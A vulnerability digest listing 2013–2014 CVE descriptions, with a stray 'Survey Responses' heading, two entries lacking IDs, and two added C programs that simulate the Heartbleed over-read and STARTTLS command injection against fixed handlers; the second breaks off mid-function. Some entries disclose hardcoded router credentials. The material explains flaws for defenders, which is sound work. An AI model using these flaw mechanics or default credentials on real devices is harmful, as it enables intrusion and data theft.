The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.

CVE-2014-9159
Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.

CVE-2014-9163
Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X, and before 11.2.202.425 on Linux, allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.

CVE-2014-9350
TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.

CVE-2014-9357
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.


Survey Responses



The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.

CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."

CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS-SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."

CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44, DSR-150N with firmware before 1.05B64, DSR-250 and DSR-250N with firmware before 1.08B44, and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.

CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.

CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.

CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.

CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
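The over-read in CVE-2014-0160 comes from trusting the peer's declared payload length. The C program below is an added example, not code from the report or from OpenSSL: it builds a heartbeat record whose header claims more payload than is present, runs it through a handler with and without the length check that 1.0.1g added, and shows that only the unchecked handler copies the bytes that sit after the record in memory. The record layout (type, 16-bit length, payload, 16 bytes of padding) follows RFC 6520; the "secret" placed after the record, the buffer sizes and the function names are constructed for the illustration.

```c
/* Added example: simulation of the CVE-2014-0160 length-check failure.
 * Not OpenSSL code; record layout per RFC 6520, everything else constructed. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define HB_REQUEST  1
#define HB_RESPONSE 2
#define HB_PADDING  16   /* RFC 6520 minimum padding */

/* Writes a heartbeat request into buf: type (1 byte), payload_length
 * (2 bytes, big-endian), payload, then 16 bytes of padding.
 * declared_len is what the header claims; actual_len is how many payload
 * bytes are really present. Returns the record length, or 0 if buf is
 * too small. */
size_t hb_build(uint8_t *buf, size_t cap, uint16_t declared_len,
                const uint8_t *payload, size_t actual_len)
{
    size_t rec_len = 1 + 2 + actual_len + HB_PADDING;
    if (rec_len > cap) return 0;
    buf[0] = HB_REQUEST;
    buf[1] = (uint8_t)(declared_len >> 8);
    buf[2] = (uint8_t)(declared_len & 0xff);
    memcpy(buf + 3, payload, actual_len);
    memset(buf + 3 + actual_len, 0, HB_PADDING);
    return rec_len;
}

/* Handles one heartbeat record and writes the response into resp.
 * check_len == 0 trusts the declared length (OpenSSL 1.0.1 before 1.0.1g);
 * check_len == 1 first checks it against the record length (the fix).
 * Returns the number of payload bytes echoed, or -1 if the record was
 * discarded or resp is too small. */
long hb_process(const uint8_t *rec, size_t rec_len, int check_len,
                uint8_t *resp, size_t resp_cap)
{
    if (rec_len < 3) return -1;
    uint16_t payload_len = (uint16_t)((rec[1] << 8) | rec[2]);

    if (check_len) {
        /* 1.0.1g: silently discard if the record cannot hold
         * header + claimed payload + minimum padding. */
        if (rec_len < 1 + 2 + HB_PADDING) return -1;
        if ((size_t)1 + 2 + payload_len + HB_PADDING > rec_len) return -1;
    }
    if ((size_t)3 + payload_len + HB_PADDING > resp_cap) return -1;

    resp[0] = HB_RESPONSE;
    resp[1] = rec[1];
    resp[2] = rec[2];
    /* The copy length comes from the peer's header, not from rec_len:
     * without the check above it reads past the end of the record. */
    memcpy(resp + 3, rec + 3, payload_len);
    memset(resp + 3 + payload_len, 0, HB_PADDING);
    return (long)payload_len;
}

/* Constructed scenario: a 4-byte payload whose header claims 64 bytes,
 * with secret bytes placed right after the record in the same buffer
 * (standing in for adjacent heap memory). */
static const char SECRET[] = "-----BEGIN RSA PRIVATE KEY-----";

static size_t hb_scenario(uint8_t *mem, size_t cap)
{
    size_t rec_len = hb_build(mem, cap, 64, (const uint8_t *)"ping", 4);
    if (rec_len == 0 || rec_len + sizeof SECRET > cap) return 0;
    memcpy(mem + rec_len, SECRET, sizeof SECRET);
    return rec_len;
}

/* Returns 1 if the unchecked handler echoes the secret back. */
int hb_demo_leaks_without_check(void)
{
    uint8_t mem[256] = {0}, resp[256] = {0};
    size_t rec_len = hb_scenario(mem, sizeof mem);
    if (rec_len == 0) return 0;
    long n = hb_process(mem, rec_len, 0, resp, sizeof resp);
    /* Echoed bytes start at resp+3 and mirror mem+3, so the first secret
     * byte, mem[rec_len], lands at resp[rec_len]. */
    return n == 64 && memcmp(resp + rec_len, SECRET, sizeof SECRET) == 0;
}

/* Returns 1 if the checked handler discards the same record. */
int hb_demo_rejected_with_check(void)
{
    uint8_t mem[256] = {0}, resp[256] = {0};
    size_t rec_len = hb_scenario(mem, sizeof mem);
    if (rec_len == 0) return 0;
    return hb_process(mem, rec_len, 1, resp, sizeof resp) == -1;
}

/* Returns 1 if an honest record (declared == actual) still round-trips
 * through the checked handler. */
int hb_demo_honest_roundtrip(void)
{
    uint8_t mem[64] = {0}, resp[64] = {0};
    size_t rec_len = hb_build(mem, sizeof mem, 4, (const uint8_t *)"ping", 4);
    if (rec_len == 0) return 0;
    return hb_process(mem, rec_len, 1, resp, sizeof resp) == 4
        && resp[0] == HB_RESPONSE && memcmp(resp + 3, "ping", 4) == 0;
}

int main(void)
{
    printf("unchecked handler leaks secret: %d\n", hb_demo_leaks_without_check());
    printf("checked handler rejects record: %d\n", hb_demo_rejected_with_check());
    printf("honest record round-trips:      %d\n", hb_demo_honest_roundtrip());
    return 0;
}
```

The point a patch-management control cannot express is visible in hb_process: the only thing separating the two behaviours is one comparison of an attacker-supplied length against the length the transport actually delivered, which is why a network-level scan for the vulnerable version was the practical detection at the time.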

CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."

CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."

CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.

CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)."

CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.

CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."

CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."

CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."

CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."

CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.

CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.

CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.

CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed .3gp file.

CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
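The nginx flaw above (and CVE-2011-0411, which it cites) is a buffering problem rather than a cryptographic one: bytes that arrive in the same read as the STARTTLS command are still in the input buffer after the handshake, so the server executes them as if the client had sent them over the encrypted channel. The C program below is an added example, not nginx code or code from the report. The SMTP handling, the wire input and the log are constructed here; the fixed behaviour it shows is simply to discard whatever plaintext remains buffered once STARTTLS is accepted, which is the property the fixed versions enforce.

```c
/* Added example: simulation of STARTTLS plaintext command injection
 * (CVE-2014-3556 / CVE-2011-0411 class). Not nginx code; the command
 * handling, wire input and log are constructed for illustration. */
#include <stdio.h>
#include <string.h>

static void log_append(char *log, size_t cap, const char *s)
{
    size_t used = strlen(log);
    if (used + 1 >= cap) return;
    strncat(log, s, cap - used - 1);
}

/* Processes one batch of bytes that arrived in a single read on the
 * plaintext side of an SMTP session, line by line. STARTTLS switches the
 * session to TLS (the handshake itself is elided). If
 * discard_after_starttls is 0, bytes left in the buffer after the
 * STARTTLS line are processed as if they had arrived inside the TLS
 * session (the flaw); if 1, they are dropped and the next read would
 * come from the decrypted stream (the fix). Commands run under TLS are
 * appended to tls_log, one per line. Returns the number of commands
 * taken from the plaintext buffer and executed after STARTTLS, or -1 on
 * bad arguments. */
int smtp_process_read(const char *wire, int discard_after_starttls,
                      char *tls_log, size_t log_cap)
{
    char buf[512];
    size_t n = strlen(wire);
    if (n >= sizeof buf || log_cap == 0) return -1;
    memcpy(buf, wire, n + 1);
    tls_log[0] = '\0';

    int tls = 0, injected = 0;
    char *line = buf;
    for (;;) {
        char *eol = strstr(line, "\r\n");
        if (eol == NULL) break;          /* partial line: wait for more data */
        *eol = '\0';
        if (!tls) {
            if (strcmp(line, "STARTTLS") == 0) {
                tls = 1;
                if (discard_after_starttls) break;
            }
            /* other plaintext commands would be dispatched here; they
             * are not the point of the example */
        } else {
            injected++;
            log_append(tls_log, log_cap, line);
            log_append(tls_log, log_cap, "\n");
        }
        line = eol + 2;
    }
    return injected;
}

/* Constructed wire input: STARTTLS and two further commands delivered in
 * the same TCP segment, the shape an on-path attacker can produce by
 * appending to the client's STARTTLS before relaying it. */
static const char WIRE[] =
    "EHLO client.example\r\nSTARTTLS\r\nRSET\r\nMAIL FROM:<attacker@example>\r\n";

/* Returns how many plaintext commands ran inside the TLS session for the
 * vulnerable (discard == 0) or fixed (discard == 1) behaviour. */
int smtp_demo(int discard_after_starttls)
{
    char log[256];
    return smtp_process_read(WIRE, discard_after_starttls, log, sizeof log);
}

int main(void)
{
    char log[256];
    int injected = smtp_process_read(WIRE, 0, log, sizeof log);
    printf("unfixed proxy: %d injected command(s)\n%s", injected, log);
    injected = smtp_process_read(WIRE, 1, log, sizeof log);
    printf("fixed proxy:   %d injected command(s)\n", injected);
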